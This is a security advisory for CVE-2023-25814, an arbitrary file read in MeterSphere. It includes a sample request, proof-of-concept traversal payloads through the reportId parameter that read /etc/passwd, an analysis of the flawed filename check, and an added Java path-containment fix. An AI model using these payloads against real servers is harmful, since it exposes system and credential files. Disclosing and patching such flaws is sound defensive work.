Headline
CVE-2023-25814: Arbitrary File Read Vulnerability
MeterSphere is an open source continuous testing platform. In versions prior to 2.7.1, a user who has permission to create a resource file through UI operations is able to append a path to their submission query which will be read by the system and displayed to the user. This allows users of the system to read arbitrary files on the filesystem of the server, so long as the server process itself has permission to read the requested files. This issue has been addressed in version 2.7.1. All users are advised to upgrade. There are no known workarounds for this issue.
Summary
The system has an arbitrary file read vulnerability; for example, the system's /etc/passwd file can be read.
This vulnerability affects versions v1.20.19-lts (latest) and below (v1.20.18-lts-b1 is also affected). Installation reference: https://metersphere.io/docs/v2.x/installation/online_installation/
Details
You need to create a resource file through UI operations. For convenience, you can also create a test file directly from the image.
The file directory is as follows:
where 1 (the directory name) is the reportId parameter of the corresponding interface, 1.txt (the file name) is the fileName parameter of that interface, and 2.txt is the first file read.
The interface request is:
GET /resource/ui/get?fileName=2&reportId=2 HTTP/1.1
Cookie: SESSION=ZjllMjRjMWEtMmRhNC00MGU0LTlkMjMtOGY1MDllOWI1ZWE3
X-Schema: http
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Connection: keep-alive
Referer: http://192.168.11.77:8081/swagger-ui/index.html?configUrl=/v3/api-docs/swagger-config
Host: 192.168.11.77:8081
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
CSRF-TOKEN: rcK0OGd0O5Df14tmgilfoCSsiJaS9OiQugGZWf19A/yCU2SXvLnPTPZNwiG9AUj0RWtFWbWCencuKk/L+90++A==
PoC
2.2 Read 2.txt
Payload:
/resource/ui/get?fileName=2.txt&reportId=1/…
Effect:
2.3 Read the passwd file
Payload:
/resource/ui/get?fileName=passwd&reportId=1/… /… /… /… /… /… /… /… /etc/
Effect:
Impact
Source code analysis
The read interface is in ResourceController.java (framework/sdk-parent/sdk/src/main/java/io/metersphere/controller/ResourceController.java).
The code is:
@GetMapping(value = "/ui/get")
public ResponseEntity getUiFile(@RequestParam("fileName") String fileName, @RequestParam("reportId") String reportId) {
    return resourceService.getUiResultImage(fileName, reportId);
}
Tracing into resourceService, the method that actually reads the file, getUiResultImage(fileName, reportId), is as follows:
public ResponseEntity getUiResultImage(String name, String reportId) {
    if (name.contains("/")) {
        MSException.throwException(Translator.get("invalid_parameter"));
    }
    return getImage(FileUtils.UI_IMAGE_DIR + "/" + reportId + "/" + name);
}
Clearly name is filtered while reportId is not. So the fileName never needs to contain a / at all: the directory traversal can be supplied entirely through reportId, and the file is then read from wherever the concatenated path points.
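A containment check that closes this gap, added here as an illustration and not MeterSphere's own 2.7.1 patch. Instead of filtering one character in one parameter, it normalizes the resolved path and requires that reportId and name each form exactly one directory segment under the base directory; the UI_IMAGE_DIR value and the method names are assumptions.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public class UiResourcePathCheck {
    // Assumed base directory for UI result images (placeholder, not the real constant).
    static final Path UI_IMAGE_DIR = Paths.get("/opt/metersphere/data/ui-images");

    // Resolves base/reportId/name and rejects anything that is not a plain
    // two-segment path under the base, whichever parameter carries the traversal.
    static Path resolveUiImage(String reportId, String name) {
        if (reportId == null || name == null || reportId.isEmpty() || name.isEmpty()) {
            throw new IllegalArgumentException("invalid_parameter");
        }
        Path base = UI_IMAGE_DIR.toAbsolutePath().normalize();
        // resolve() lets an absolute argument replace the base; normalize() collapses "." and "..".
        Path candidate = base.resolve(reportId).resolve(name).normalize();
        int depth = base.getNameCount();
        boolean contained = candidate.startsWith(base)
                && candidate.getNameCount() == depth + 2
                // After normalization each parameter must still equal its own segment,
                // so "1/../2" (which normalizes to segment "2") is refused as well.
                && candidate.getName(depth).toString().equals(reportId)
                && candidate.getFileName().toString().equals(name);
        if (!contained) {
            throw new IllegalArgumentException("invalid_parameter");
        }
        return candidate;
    }

    static boolean isAccepted(String reportId, String name) {
        try {
            resolveUiImage(reportId, name);
            return true;
        } catch (IllegalArgumentException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed inputs modelled on the advisory's requests.
        System.out.println(isAccepted("1", "2.txt"));                  // true: the legitimate case
        System.out.println(isAccepted("1/../2", "2.txt"));             // false: escapes report 1
        System.out.println(isAccepted("1/../../../../../../etc", "passwd")); // false: leaves the base dir
        System.out.println(isAccepted("/etc", "passwd"));              // false: absolute reportId
        System.out.println(isAccepted("1", "../2.txt"));               // false: traversal in name
    }
}
```

The check is applied to the final resolved path rather than to either input string, so it does not depend on which of the two parameters the original contains("/") test happened to cover.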